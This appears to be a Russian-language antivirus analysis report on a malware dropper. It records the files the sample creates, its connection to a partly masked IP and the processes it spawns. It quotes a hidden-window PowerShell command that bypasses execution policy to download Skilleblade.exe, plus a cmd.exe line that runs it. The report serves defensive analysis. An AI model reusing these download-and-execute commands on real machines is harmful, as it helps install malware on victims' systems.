Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://35.##5.155.135/skilleblade.exe как %appdata%\skilleblade.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Skilleblade.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\dzdtfhgygeghd{В .sct
- %APPDATA%\skilleblade.exe
- %TEMP%\nsm20e9.tmp
- %HOMEPATH%\nephritis\viljestyrkes\sexology\filao\burrock.pho191
- %HOMEPATH%\nephritis\viljestyrkes\smells\miljinvesteringer\arborist\docimasies\armourycrate.usersessionhelper.visualelementsmanifest.xml
- %HOMEPATH%\nephritis\viljestyrkes\smells\miljinvesteringer\arborist\docimasies\keratoconi.bed
- %HOMEPATH%\nephritis\viljestyrkes\smells\miljinvesteringer\arborist\docimasies\ascontrolhelper.dll
- %HOMEPATH%\nephritis\viljestyrkes\smells\miljinvesteringer\arborist\docimasies\cantarell-light.otf
- %HOMEPATH%\nephritis\viljestyrkes\smells\miljinvesteringer\arborist\docimasies\checkbox-mixed-symbolic.symbolic.png
- %HOMEPATH%\nephritis\viljestyrkes\image-loading-symbolic.symbolic.png
- %HOMEPATH%\nephritis\viljestyrkes\libpixbufloader-pnm.dll
- %TEMP%\nsw531f.tmp
- %TEMP%\nsw6873.tmp
- %CommonProgramFiles(x86)%\laminat.ini
- %TEMP%\nsrf393.tmp\system.dll
Удаляет следующие файлы
- %TEMP%\dzdtfhgygeghd{В .sct
Сетевая активность
Подключается к
- '35.##5.155.135':80
TCP
Запросы HTTP GET
- http://35.##5.155.135/Skilleblade.exe
Другое
Создает и запускает на исполнение
- '%APPDATA%\skilleblade.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Skilleblade.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://35.##5.155.135/Skilleblade.exe','%APPDATA%\Skilleblade.exe')' (со скрытым окном)
